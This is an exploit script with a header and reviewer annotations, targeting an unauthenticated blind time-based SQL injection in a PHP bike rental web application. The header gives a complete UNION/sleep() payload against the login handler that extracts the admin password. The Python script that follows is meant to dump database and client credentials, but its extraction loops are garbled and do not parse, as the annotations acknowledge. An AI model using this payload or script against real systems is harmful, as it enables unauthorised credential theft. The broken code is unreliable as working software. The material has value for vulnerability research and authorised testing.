# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Chase Comardelle(CASO)
# Date: October 18, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip
# Tested on: Kali Linux, Apache, MySQL
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Motorcycle (Bike) Rental System is vulnerable to an unauthenticated, blind,
# time-based SQL injection. Because the injection is blind, data is recovered one
# character at a time by making the server sleep() when a guessed character matches
# and measuring the response delay; an attacker can use this to dump credentials
# from the backing MySQL database.
#
# Per the example payload below, the injection point is the e-mail value submitted
# to /classes/Login.php?f=login_user (the same path every extraction function
# targets), and the UNION has nine columns (IF(...) plus eight NULLs).
#
#EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;
#EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/
#
# NOTE(review): this copy of the script is damaged. In each of the four extraction
# functions everything between "while i" and "1:" -- the loop condition, the timed
# POST request and the elapsed-time comparison -- was stripped (it was evidently
# inside angle brackets and lost during extraction), as was the "<url>" placeholder
# in the usage message. The surviving tokens are kept verbatim below and are
# annotated rather than reconstructed; the four extraction functions do not parse
# as-is. Use only against systems you are authorized to test.

import requests
import sys
import urllib3
# Third-party dependency used solely for the ASCII-art banner in print_header().
import pyfiglet

# Suppresses the InsecureRequestWarning that urllib3 raises for requests made with
# verify=False. That implies the (missing) request calls disable TLS certificate
# verification -- fine for a lab PoC, but it also hides an intercepted/MITM'd
# session from the operator.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Local intercepting-proxy settings (Burp/ZAP-style listener on 127.0.0.1:8080).
# Nothing visible in this copy references `proxies`; whether the lost request calls
# pass proxies=proxies cannot be told from here. If they do, note that the 'https'
# entry uses an https:// scheme, which most local interception proxies do not speak.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}


def find_clients_usernames(url: str) -> str:
    """Recover application (client) usernames via the time-based injection.

    Intended behaviour, as far as the surviving code shows: walk `chars` one
    candidate at a time for the character at `position`; when a candidate is
    confirmed (the delayed-response branch) append it to `clients`, reset the
    candidate index and advance `position`; otherwise try the next candidate.
    Returns the accumulated string, which the caller splits on ','.

    url: base URL of the target, as passed on the command line.
    """
    clients = ""
    # NOTE(review): the dict key is literally 'Cookie:' (with a colon). If this dict
    # is handed to requests as cookies=, the client sends a cookie *named* "Cookie:"
    # with value "PHPSESSID=", not a PHPSESSID cookie. Almost certainly unintended,
    # though harmless for an unauthenticated injection.
    cookies = {'Cookie:':'PHPSESSID='}
    # Referer/Origin are hard-coded to localhost rather than derived from `url`; a
    # target that validates Origin/Referer would reject these when run remotely.
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    # Vulnerable login handler; the injected value travels in the POST body.
    path = '/classes/Login.php?f=login_user'
    position = 1   # 1-based SUBSTRING offset of the character being recovered
    i=0            # index into `chars` of the current candidate
    # NOTE(review): extraction damage -- the loop condition, the request and the
    # timing check between "while i" and "1:" are missing. The ":" after "1"
    # suggests a threshold comparison (e.g. elapsed > 1) -- unconfirmed. The
    # following line is the surviving token sequence and does not parse.
    while i 1: clients += chars[i] i=0 position+=1 else: i +=1
    return clients


def find_db_usernames(url: str) -> str:
    """Recover database usernames via the time-based injection.

    Same request setup and candidate-walking loop as find_clients_usernames();
    only the accumulator name differs (the injected query itself is among the
    lost text, so which table/column is read cannot be confirmed here).

    url: base URL of the target.
    """
    users = ""
    # Same mis-keyed 'Cookie:' dict as in find_clients_usernames().
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    # NOTE(review): loop condition, request and timing check lost in extraction;
    # surviving tokens kept verbatim, does not parse.
    while i 1: users += chars[i] i=0 position+=1 else: i +=1
    return users


def find_db_passwords(url: str) -> str:
    """Recover database passwords via the time-based injection.

    Same structure as find_db_usernames(). Returns the comma-joined string the
    caller splits on ','.

    url: base URL of the target.
    """
    passwords = ""
    clientCount = 0   # assigned but never read in this copy
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    # NOTE(review): loop condition, request and timing check lost in extraction;
    # surviving tokens kept verbatim, does not parse.
    while i 1: passwords += chars[i] i=0 position+=1 else: i +=1
    return passwords


def find_client_passwords(url: str) -> str:
    """Recover application (client) passwords via the time-based injection.

    Same structure as find_db_passwords(); only the data read by the (lost)
    injected query differs.

    url: base URL of the target.
    """
    passwords = ""
    clientCount = 0   # assigned but never read in this copy
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    # NOTE(review): loop condition, request and timing check lost in extraction;
    # surviving tokens kept verbatim, does not parse.
    while i 1: passwords += chars[i] i=0 position+=1 else: i +=1
    return passwords


def create_table(users: list[str], passwords: list[str]) -> None:
    """Print `users[i] | passwords[i]` for every index of `users`.

    Pairs strictly by index: if `passwords` has fewer entries than `users`
    (e.g. one of the extractions stopped early) the loop raises IndexError
    after printing the matched rows. Extra passwords are silently ignored.
    """
    for i in range(0,len(users)):
        print(users[i]," | ",passwords[i])


def print_header() -> None:
    """Print the tool banner (plain text plus a pyfiglet ASCII-art tag)."""
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("[*] Online Motorcycle (Bike) Rental System [*]")
    print("[*] Unauthenticated Blind Time-Based SQL Injection [*]")
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("\n")
    print(pyfiglet.figlet_format(" CAS0", font = "slant" ))


# Candidate alphabet tried at each position, in this order: lowercase, uppercase,
# digits, then '@', '#', ',' and '.'. Anything outside this set (e.g. '!', '$',
# '-', '_', '/', space) can never be recovered, so a value containing such a
# character stalls or corrupts the extraction.
# NOTE(review): ',' is both a member of this alphabet and the separator main()
# splits the recovered strings on, so a recovered value that itself contains a
# comma will be split into two entries and misalign users against passwords.
chars = [
    'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
    'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
    'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
    'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
    '8','9','@','#',",",'.',
]


if __name__ == "__main__":
    # Single positional argument: the target base URL (see EXAMPLE EXECUTION above).
    try:
        url = sys.argv[1].strip()
    except IndexError:
        # NOTE(review): the "<url>" placeholder after "%s" was lost with the other
        # angle-bracket text; the example also disagrees with the header (bare host
        # here vs. a full http://.../bike_rental/ URL in EXAMPLE EXECUTION).
        print("[-] Usage: %s " % sys.argv[0])
        print("[-] Example: %s www.example.com" % sys.argv[0])
        sys.exit(-1)
    print_header()
    print("[*] RETRIEVING CREDENTIALS NOW [*]")
    # Each extraction returns one comma-joined string; split it into a list
    # before tabulating (see the ',' caveat on `chars`).
    dbUsernames = find_db_usernames(url)
    dbUsernames = dbUsernames.split(",")
    dbPasswords = find_db_passwords(url)
    dbPasswords = dbPasswords.split(",")
    print("[*] DATABASE CREDENTIALS [*]")
    create_table(dbUsernames,dbPasswords)
    # Note the deliberate-looking but confusing rename: clientUsernames holds the
    # raw string, clientsUsernames (with an 's') the split list.
    clientUsernames = find_clients_usernames(url)
    clientsUsernames = clientUsernames.split(",")
    clientPasswords = find_client_passwords(url)
    clientPasswords = clientPasswords.split(",")
    print("[*] CLIENT CREDENTIALS [*]")
    create_table(clientsUsernames,clientPasswords)